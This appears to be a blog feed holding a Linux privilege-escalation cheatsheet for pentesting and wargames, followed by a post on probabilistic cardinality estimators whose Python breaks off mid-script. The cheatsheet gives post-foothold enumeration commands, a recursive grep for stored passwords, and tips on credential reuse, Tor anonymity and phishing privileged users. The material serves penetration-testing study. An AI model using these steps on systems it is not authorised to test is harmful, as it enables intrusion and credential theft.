"MathJax.Hub.Register.StartupHook('HTML-CSS Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax['HTML-CSS'].FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"MathJax.Hub.Register.StartupHook('SVG Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax.SVG.FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"}";
(document.body || document.getElementsByTagName('head')[0]).appendChild(configscript);
(document.body || document.getElementsByTagName('head')[0]).appendChild(mathjaxscript);
}
</script>Privilege Escalation Techniques2016-08-10T12:37:00+02:002016-08-10T12:37:00+02:00Nikolai Tschachertag:incolumitas.com,2016-08-10:/2016/08/10/linux-privilege-escalation/<p>This blog post will serve as a cheatsheet to help in my future pentesting experiments and wargames when I am stuck and don't know how to proceed. I hope it will be of use for some people out there. This document will likely change and evolve in future revisions.</p>
<p>In this blog post I will discuss common privilege escalation techniques. I assume that an attack got a foothold into the server by spawning a webshell over SQL-Injections or similar web exploitation vectors.</p>
<h3>Helpful resources</h3>
<p>Other people have published great information about privilege escalation process.</p>
<ul>
<li>https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List#credentials</li>
<li>https://github.com/PenturaLabs/Linux_Exploit_Suggester</li>
<li>http://www.rebootuser.com/?p=1623#.V64XaN_S30p</li>
<li>Script for common checks and detailed security report: <a href="https://github.com/rebootuser/LinEnum">LinEnum</a></li>
</ul>
<h3>Make use of discovered credentials</h3>
<p>Often you can find login credentials to a custom admin web interface in the database. Because humans tend to reuse the same credentials on different services, it's always worth to check if the discovered login credentials work on other services such as SSH or Telnet. If you can access <code>/etc/passwd</code>, you can try all found credentials on all running services on all user accounts in the passwd file …</p><p>This blog post will serve as a cheatsheet to help in my future pentesting experiments and wargames when I am stuck and don't know how to proceed. I hope it will be of use for some people out there. This document will likely change and evolve in future revisions.</p>
<p>In this blog post I will discuss common privilege escalation techniques. I assume that an attack got a foothold into the server by spawning a webshell over SQL-Injections or similar web exploitation vectors.</p>
<h3>Helpful resources</h3>
<p>Other people have published great information about privilege escalation process.</p>
<ul>
<li>https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List#credentials</li>
<li>https://github.com/PenturaLabs/Linux_Exploit_Suggester</li>
<li>http://www.rebootuser.com/?p=1623#.V64XaN_S30p</li>
<li>Script for common checks and detailed security report: <a href="https://github.com/rebootuser/LinEnum">LinEnum</a></li>
</ul>
<h3>Make use of discovered credentials</h3>
<p>Often you can find login credentials to a custom admin web interface in the database. Because humans tend to reuse the same credentials on different services, it's always worth to check if the discovered login credentials work on other services such as SSH or Telnet. If you can access <code>/etc/passwd</code>, you can try all found credentials on all running services on all user accounts in the passwd file. You may discover the running services with the command <code>netstat -tulpen</code>. If you want to remain anonymous, you should consider tunneling your TCP traffic through TOR with <code>torsocks</code>.</p>
<h3>Search for passwords in the webroot</h3>
<p>If the attacked has spawned a simple shell in the webapp context, it's often only possible to view and modify files in the very same document root. There you can launch a search for common passwords with a command like the following: <code>grep -r -E -l -i -s 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' /etc/</code>. The <code>-s</code> switch suppresses all error messages that originate by grep from accessing files that cannot be read. The <code>-l</code> flag only prints the files in which the pattern matched, not the matching occurrences. Often people leave all kinds of passwords stored in their webroot. The database credentials for the local webapp might be the same as for the root user of the DBMS.</p>
<h3>Look up privilege escalation exploits</h3>
<p>After issuing an command like <code>uname -a</code> and obtaining the exact kernel version and linux distribution you can try your luck and find some local root exploits. I never had much luck going down that route to be honest, because in the most cases the operating system is up to date. A good starting point is the good old <a href="https://www.exploit-db.com/">exploit database</a>. You might have more look by trying to exploit installed applications. To find said installed application, you can list them with <code>rpm -qa --last | head</code> or with <code>dpkg -l</code>.</p>
<h3>Identify the running services and look for configuration flaws</h3>
<p>This is probably the best way to increase your privileges. It depends on the exact distribution how to look up the running services. On CentOS you can lookup running services by <code>service --status-all</code>. To see what ports are open, you can always use <code>netstat -tulpen</code> and then lookup the services behind the open ports. Then for each identified service, you need to check the configuration files for configuration mistakes. Often you are able to find passwords in FTP Servers or there are <code>.rhosts</code> files that included credentials for remote logins. But sometimes configuration files are also writeable and you can overwrite existing config files with harmful options.</p>
<h3>Setup some traps for users with higher privileges</h3>
<p>If you can only access a certain part of the system, you might be able to trick the user into providing their passwords for themselves. For example if you control the web mail account of a user that has higher privileges (but you only access the web app of this privileged user), you can write mails to other users of the system by abusing the reputation of the mail account and simply social engineer missing passwords. Good resources for these kind of exploits can be found <a href="">here</a>. Symlinks are dangerous tools if used correctly.</p>Probabilistic data structures to estimate cardinalities and frequencies of massive streams2016-07-20T22:44:00+02:002016-07-20T22:44:00+02:00Nikolai Tschachertag:incolumitas.com,2016-07-20:/2016/07/20/probabilistic-sketches-big-data/<p>In the following blog post we will introduce three different Big Data algorithms. More specifically, we will
learn about probabilistic data structures that allow us to estimate cardinalities and frequencies of
elements that originate from a massive stream of data. This blog post is heavily inspired by a the well written article on <a href="https://highlyscalable.wordpress.com/2012/05/01/probabilistic-structures-web-analytics-data-mining/">probabilistic data structures for web analytics and data mining</a>. I will not cover the mathematics behind those data structures, the beforementioned blog post does that much better. And if not, then you should probably consult the original papers.</p>
<h3>What is Big Data anyways?</h3>
<p>Everybody talks nowadays about Big Data, but what does it mean? For example, if we want to count the number of distinct IP Addresses that a very large web site encounters on each day, we need new approaches. Consider the following straightforward algorithm:</p>
<div class="highlight"><pre><span></span><code><span class="n">unique_ip_addresses</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
<span class="k">for</span> <span class="n">ip</span> <span class="ow">in</span> <span class="n">stream_of_ip_addresses</span><span class="p">:</span>
<span class="n">unique_ip_addresses</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">ip</span><span class="p">)</span>
<span class="k">if</span> <span class="n">end_of_day</span><span class="p">(</span><span class="n">time</span><span class="p">):</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'We got </span><span class="si">{}</span><span class="s1"> distinct ip addresses'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">unique_ip_addresses</span><span class="p">)))</span>
<span class="n">unique_ip_addresses</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
</code></pre></div>
<p>This way of counting distinct elements works fine for millions of visitors. But what happens if a website is visited 10 Billion times a day …</p><p>In the following blog post we will introduce three different Big Data algorithms. More specifically, we will
learn about probabilistic data structures that allow us to estimate cardinalities and frequencies of
elements that originate from a massive stream of data. This blog post is heavily inspired by a the well written article on <a href="https://highlyscalable.wordpress.com/2012/05/01/probabilistic-structures-web-analytics-data-mining/">probabilistic data structures for web analytics and data mining</a>. I will not cover the mathematics behind those data structures, the beforementioned blog post does that much better. And if not, then you should probably consult the original papers.</p>
<h3>What is Big Data anyways?</h3>
<p>Everybody talks nowadays about Big Data, but what does it mean? For example, if we want to count the number of distinct IP Addresses that a very large web site encounters on each day, we need new approaches. Consider the following straightforward algorithm:</p>
<div class="highlight"><pre><span></span><code><span class="n">unique_ip_addresses</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
<span class="k">for</span> <span class="n">ip</span> <span class="ow">in</span> <span class="n">stream_of_ip_addresses</span><span class="p">:</span>
<span class="n">unique_ip_addresses</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">ip</span><span class="p">)</span>
<span class="k">if</span> <span class="n">end_of_day</span><span class="p">(</span><span class="n">time</span><span class="p">):</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'We got </span><span class="si">{}</span><span class="s1"> distinct ip addresses'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">unique_ip_addresses</span><span class="p">)))</span>
<span class="n">unique_ip_addresses</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
</code></pre></div>
<p>This way of counting distinct elements works fine for millions of visitors. But what happens if a website is visited 10 Billion times a day? Then we would need to maintain a set with space 10^10 * 4 Bytes = 40GB of RAM. Most normal computers simply don't have this huge amount of RAM. Additionally, the <code>add</code> operation on the set becomes slower and slower, because we need to search through the whole array to check whether we already added the element previously. In this blog post we need to simulate such a massive stream of ip addresses. We abstract from real elements and use simply integers. My stream implementation is very easy:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">random</span>
<span class="k">class</span> <span class="nc">Stream</span><span class="p">:</span>
<span class="sd">"""</span>
<span class="sd"> Produces random elements and simulates a stream.</span>
<span class="sd"> """</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">rand_range</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> n : Number of elements to produce.</span>
<span class="sd"> rand_range : Produced elements are in this random range.</span>
<span class="sd"> """</span>
<span class="bp">self</span><span class="o">.</span><span class="n">n</span> <span class="o">=</span> <span class="n">n</span>
<span class="bp">self</span><span class="o">.</span><span class="n">range</span> <span class="o">=</span> <span class="n">rand_range</span>
<span class="k">def</span> <span class="nf">produce</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">n</span><span class="p">):</span>
<span class="k">yield</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="o">*</span><span class="bp">self</span><span class="o">.</span><span class="n">range</span><span class="p">)</span>
<span class="k">def</span> <span class="fm">__iter__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">return</span> <span class="bp">self</span><span class="o">.</span><span class="n">produce</span><span class="p">()</span>
</code></pre></div>
<h3>Counting distinct elements in a stream with much less space</h3>
<p>There are data structures that allow us to determine the cardinality of a set with much less space than O(n). They can do so by trading accuracy against space consumption. Those data structures can estimate cardinalities within an acceptable margin of error by using much less space than O(n).</p>
<h3>Linear Counting</h3>
<p>The idea behind the linear counter is to use a bitmask of length <code>m</code>. <code>m</code> is chosen to be around <code>m = n/5</code>. Then we use a hash function <code>h: n -> m</code>. Whenever an element arrives from the stream, we hash this element and use the hash result as an index to set in the bitmask. Then to count the cardinality, we compute the formula <code>-m * ln((m - sum(bitmask)) / m)</code>. This yields an estimation of the cardinality. This approach is implemented in the following pseudo code:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="kn">from</span> <span class="nn">stream</span> <span class="kn">import</span> <span class="n">Stream</span>
<span class="k">class</span> <span class="nc">CardinalityCounter</span><span class="p">:</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">m</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">=</span> <span class="n">m</span>
<span class="c1"># simulate the bitmask by using</span>
<span class="c1"># a list with length m</span>
<span class="bp">self</span><span class="o">.</span><span class="n">bitmask</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">*</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">def</span> <span class="nf">hash</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
<span class="n">evenly_distributed</span> <span class="o">=</span> <span class="n">value</span> <span class="o">*</span> <span class="mi">19441</span> <span class="o">+</span> <span class="mi">73877</span>
<span class="k">return</span> <span class="n">evenly_distributed</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">m</span>
<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
<span class="n">hvalue</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">hash</span><span class="p">(</span><span class="n">value</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">bitmask</span><span class="p">[</span><span class="n">hvalue</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span>
<span class="k">def</span> <span class="nf">get_cardinality</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Estimates the cardinality.</span>
<span class="sd"> """</span>
<span class="n">weight</span> <span class="o">=</span> <span class="nb">sum</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">bitmask</span><span class="p">)</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">==</span> <span class="n">weight</span><span class="p">:</span>
<span class="k">raise</span> <span class="ne">Exception</span><span class="p">(</span><span class="s1">'Cannot estimate cardinality, weight equals m'</span><span class="p">)</span>
<span class="k">return</span> <span class="o">-</span><span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">*</span> <span class="n">math</span><span class="o">.</span><span class="n">log</span><span class="p">((</span><span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">-</span> <span class="n">weight</span><span class="p">)</span> <span class="o">/</span> <span class="bp">self</span><span class="o">.</span><span class="n">m</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="n">n</span> <span class="o">=</span> <span class="mi">100000</span>
<span class="n">randrange</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1000000</span><span class="p">)</span>
<span class="n">m</span> <span class="o">=</span> <span class="mi">25000</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">Stream</span><span class="p">(</span><span class="n">n</span><span class="p">,</span> <span class="n">randrange</span><span class="p">)</span>
<span class="n">c</span> <span class="o">=</span> <span class="n">CardinalityCounter</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
<span class="n">real_cardinality</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
<span class="k">for</span> <span class="n">a</span> <span class="ow">in</span> <span class="n">s</span><span class="o">.</span><span class="n">produce</span><span class="p">():</span>
<span class="n">c</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">real_cardinality</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">real</span><span class="p">,</span> <span class="n">est</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">real_cardinality</span><span class="p">),</span> <span class="n">c</span><span class="o">.</span><span class="n">get_cardinality</span><span class="p">()</span>
<span class="n">error</span> <span class="o">=</span> <span class="nb">abs</span><span class="p">(</span><span class="mi">1</span> <span class="o">-</span> <span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">real</span><span class="p">)</span><span class="o">/</span><span class="n">est</span><span class="p">))</span> <span class="o">*</span> <span class="mi">100</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Load factor is '</span><span class="p">,</span> <span class="n">n</span><span class="o">/</span><span class="n">m</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Estimated cardinality is '</span><span class="p">,</span> <span class="n">est</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Real cardinality is '</span><span class="p">,</span> <span class="n">real</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Error is: </span><span class="si">{0:.2f}</span><span class="s1">%'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">error</span><span class="p">))</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>
<p>The problem with this approach is, that it consumes also <code>O(n)</code> space, although much less than a trivial counter implementation, because we use only around <code>n/5</code> <strong>bits</strong> (instead of n * 4 <strong>Bytes</strong> in the trivial algorithm). But we can do much better.</p>
<h3>LogLog Counter</h3>
<p>The idea behind the LogLog Counter to estimate cardinalities is very beautiful: Whenever an element arrives from the data stream, we apply an hash function on it and visualize the hash value as bit string. In the example below, the hash value is only one Byte. In real life applications, it could be much larger.</p>
<div class="highlight"><pre><span></span><code><span class="n">Element</span><span class="w"> </span><span class="mi">534</span><span class="w"> </span><span class="n">arrives</span><span class="o">:</span><span class="w"> </span><span class="n">h</span><span class="p">(</span><span class="mi">534</span><span class="p">)</span><span class="w"> </span><span class="o">-></span><span class="w"> </span><span class="mo">00110011</span><span class="w"></span>
<span class="n">Element</span><span class="w"> </span><span class="mi">44</span><span class="w"> </span><span class="n">arrives</span><span class="o">:</span><span class="w"> </span><span class="n">h</span><span class="p">(</span><span class="mi">44</span><span class="p">)</span><span class="w"> </span><span class="o">-></span><span class="w"> </span><span class="mi">10110010</span><span class="w"></span>
<span class="n">Element</span><span class="w"> </span><span class="mi">75</span><span class="w"> </span><span class="n">arrives</span><span class="o">:</span><span class="w"> </span><span class="n">h</span><span class="p">(</span><span class="mi">75</span><span class="p">)</span><span class="w"> </span><span class="o">-></span><span class="w"> </span><span class="mi">11000110</span><span class="w"></span>
<span class="p">...</span><span class="w"></span>
<span class="n">Element</span><span class="w"> </span><span class="n">n</span><span class="w"> </span><span class="n">arrives</span><span class="o">:</span><span class="w"> </span><span class="n">h</span><span class="p">(</span><span class="n">n</span><span class="p">)</span><span class="w"> </span><span class="o">-></span><span class="w"> </span><span class="n">x</span><span class="w"></span>
</code></pre></div>
<p>If the hash function distributes bits uniformly (as every good hash function should), we can expect that</p>
<div class="highlight"><pre><span></span><code><span class="mf">1</span><span class="o">/</span><span class="mf">2</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">all</span><span class="w"> </span><span class="n">hash</span><span class="w"> </span><span class="nb">val</span><span class="n">ues</span><span class="w"> </span><span class="n">begin</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">an</span><span class="w"> </span><span class="mf">1</span><span class="p">:</span><span class="w"> </span><span class="mf">1.......</span><span class="w"></span>
<span class="mf">1</span><span class="o">/</span><span class="mf">4</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">all</span><span class="w"> </span><span class="n">hash</span><span class="w"> </span><span class="nb">val</span><span class="n">ues</span><span class="w"> </span><span class="n">begin</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">an</span><span class="w"> </span><span class="mf">01</span><span class="p">:</span><span class="w"> </span><span class="mf">01......</span><span class="w"></span>
<span class="mf">1</span><span class="o">/</span><span class="mf">8</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">all</span><span class="w"> </span><span class="n">hash</span><span class="w"> </span><span class="nb">val</span><span class="n">ues</span><span class="w"> </span><span class="n">begin</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">an</span><span class="w"> </span><span class="mf">001</span><span class="p">:</span><span class="w"> </span><span class="mf">001.....</span><span class="w"></span>
<span class="mf">...</span><span class="w"></span>
<span class="mf">1</span><span class="o">/</span><span class="mf">2</span><span class="o">^</span><span class="n">k</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">all</span><span class="w"> </span><span class="n">hash</span><span class="w"> </span><span class="nb">val</span><span class="n">ues</span><span class="w"> </span><span class="n">begin</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="mf">0000...1</span><span class="w"></span>
</code></pre></div>
<p>The first <code>1</code> of the binary representation of the hash value is defined as the rank of the hash value.</p>
<p>We can use this fact about uniform distributions to our advantage: We create <code>m</code> buckets. For every element of the stream that we encounter, we determine its bucket by the first <code>log(m)</code> bits of the hash value. With the remaining bits, we compute the rank. We update the bucket with this rank only if it is higher than the current rank. By doing so, we store the highest rank in those <code>m</code> buckets. If we have stored the rank 10 in some bucket <code>k</code>, then we know that on average we have already seen <code>2^k</code> distinct elements before. This beautiful idea is implemented in the Python code below. As a hash function, we chose <code>md5</code>. It is definitely not the best choice, since it is a cryptographic hash function and thus relatively slow.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="kn">import</span> <span class="nn">hashlib</span>
<span class="kn">import</span> <span class="nn">numpy</span> <span class="k">as</span> <span class="nn">np</span>
<span class="kn">from</span> <span class="nn">stream</span> <span class="kn">import</span> <span class="n">Stream</span>
<span class="n">np</span><span class="o">.</span><span class="n">set_printoptions</span><span class="p">(</span><span class="n">threshold</span><span class="o">=</span><span class="n">np</span><span class="o">.</span><span class="n">inf</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">LogLogCounter</span><span class="p">:</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">H</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">etype</span><span class="o">=</span><span class="mi">8</span><span class="p">,</span> <span class="n">n</span><span class="o">=</span><span class="mi">100000</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> H: length of hash function in bits</span>
<span class="sd"> k: number of bits that determine bucket</span>
<span class="sd"> etype: number of bits for each estimator (Not used yet)</span>
<span class="sd"> """</span>
<span class="bp">self</span><span class="o">.</span><span class="n">H</span> <span class="o">=</span> <span class="n">H</span>
<span class="bp">self</span><span class="o">.</span><span class="n">k</span> <span class="o">=</span> <span class="n">k</span>
<span class="bp">self</span><span class="o">.</span><span class="n">etype</span> <span class="o">=</span> <span class="n">etype</span> <span class="c1"># currently ignored</span>
<span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">=</span> <span class="mi">2</span><span class="o">**</span><span class="bp">self</span><span class="o">.</span><span class="n">k</span>
<span class="bp">self</span><span class="o">.</span><span class="n">estimators</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">zeros</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">m</span><span class="p">,</span> <span class="n">dtype</span><span class="o">=</span><span class="n">np</span><span class="o">.</span><span class="n">int8</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">hash_func_len</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">math</span><span class="o">.</span><span class="n">log</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">m</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span> <span class="o">+</span> <span class="n">math</span><span class="o">.</span><span class="n">floor</span><span class="p">(</span><span class="n">math</span><span class="o">.</span><span class="n">log</span><span class="p">(</span><span class="n">n</span><span class="o">/</span><span class="bp">self</span><span class="o">.</span><span class="n">m</span><span class="p">)</span> <span class="o">+</span> <span class="mi">3</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">hash</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> hashes the value and returns a 128 bit long bitstring.</span>
<span class="sd"> md5 is used, other hash functions might also work.</span>
<span class="sd"> """</span>
<span class="n">m</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">()</span>
<span class="n">m</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">value</span><span class="p">))</span>
<span class="n">h</span> <span class="o">=</span> <span class="n">m</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span>
<span class="k">return</span> <span class="s1">'</span><span class="si">{0:0128b}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="mi">16</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">get_bits</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">start</span><span class="p">,</span> <span class="n">end</span><span class="p">,</span> <span class="n">number</span><span class="o">=</span><span class="kc">False</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Get a number from the bitstring specified by the range</span>
<span class="sd"> from start to end.</span>
<span class="sd"> """</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">value</span><span class="p">[</span><span class="n">start</span><span class="p">:</span><span class="n">end</span><span class="p">]</span>
<span class="k">if</span> <span class="n">number</span><span class="p">:</span>
<span class="k">return</span> <span class="nb">int</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="n">s</span>
<span class="k">def</span> <span class="nf">rank</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Find the position of the first '1' bit in the hash value.</span>
<span class="sd"> 100...b has rank 1</span>
<span class="sd"> 001...b has rank 3</span>
<span class="sd"> 0000001...b has rank 7</span>
<span class="sd"> """</span>
<span class="k">try</span><span class="p">:</span>
<span class="k">return</span> <span class="n">value</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s1">'1'</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span>
<span class="k">except</span> <span class="ne">ValueError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="k">return</span> <span class="nb">len</span><span class="p">(</span><span class="n">value</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
<span class="n">hashed</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">hash</span><span class="p">(</span><span class="n">value</span><span class="p">)</span>
<span class="n">bucket</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">get_bits</span><span class="p">(</span><span class="n">hashed</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">k</span><span class="p">,</span> <span class="n">number</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">estimators</span><span class="p">[</span><span class="n">bucket</span><span class="p">]</span> <span class="o">=</span> <span class="nb">max</span><span class="p">(</span>
<span class="bp">self</span><span class="o">.</span><span class="n">estimators</span><span class="p">[</span><span class="n">bucket</span><span class="p">],</span>
<span class="bp">self</span><span class="o">.</span><span class="n">rank</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">get_bits</span><span class="p">(</span><span class="n">hashed</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">k</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">H</span><span class="p">))</span>
<span class="p">)</span>
<span class="k">def</span> <span class="nf">estimate_cardinality</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="n">est_factor</span> <span class="o">=</span> <span class="mf">0.39701</span>
<span class="n">power</span> <span class="o">=</span> <span class="p">(</span><span class="mf">1.0</span><span class="o">/</span><span class="bp">self</span><span class="o">.</span><span class="n">m</span><span class="p">)</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">estimators</span><span class="o">.</span><span class="n">sum</span><span class="p">()</span>
<span class="n">est</span> <span class="o">=</span> <span class="n">est_factor</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">m</span> <span class="o">*</span> <span class="mi">2</span><span class="o">**</span><span class="n">power</span>
<span class="k">return</span> <span class="nb">int</span><span class="p">(</span><span class="n">est</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="n">n</span> <span class="o">=</span> <span class="mi">100000</span>
<span class="n">randrange</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1000000</span><span class="p">)</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">Stream</span><span class="p">(</span><span class="n">n</span><span class="p">,</span> <span class="n">randrange</span><span class="p">)</span>
<span class="n">real_card</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
<span class="n">loglogc</span> <span class="o">=</span> <span class="n">LogLogCounter</span><span class="p">(</span><span class="mi">128</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span>
<span class="k">for</span> <span class="n">a</span> <span class="ow">in</span> <span class="n">s</span><span class="o">.</span><span class="n">produce</span><span class="p">():</span>
<span class="n">loglogc</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">real_card</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">real</span><span class="p">,</span> <span class="n">est</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">real_card</span><span class="p">),</span> <span class="n">loglogc</span><span class="o">.</span><span class="n">estimate_cardinality</span><span class="p">()</span>
<span class="n">error</span> <span class="o">=</span> <span class="nb">abs</span><span class="p">(</span><span class="mi">1</span> <span class="o">-</span> <span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">real</span><span class="p">)</span><span class="o">/</span><span class="n">est</span><span class="p">))</span> <span class="o">*</span> <span class="mi">100</span>
